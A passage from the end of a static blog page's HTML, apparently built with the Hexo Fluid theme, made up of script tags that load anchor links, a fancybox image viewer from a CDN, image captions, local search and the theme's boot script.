          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
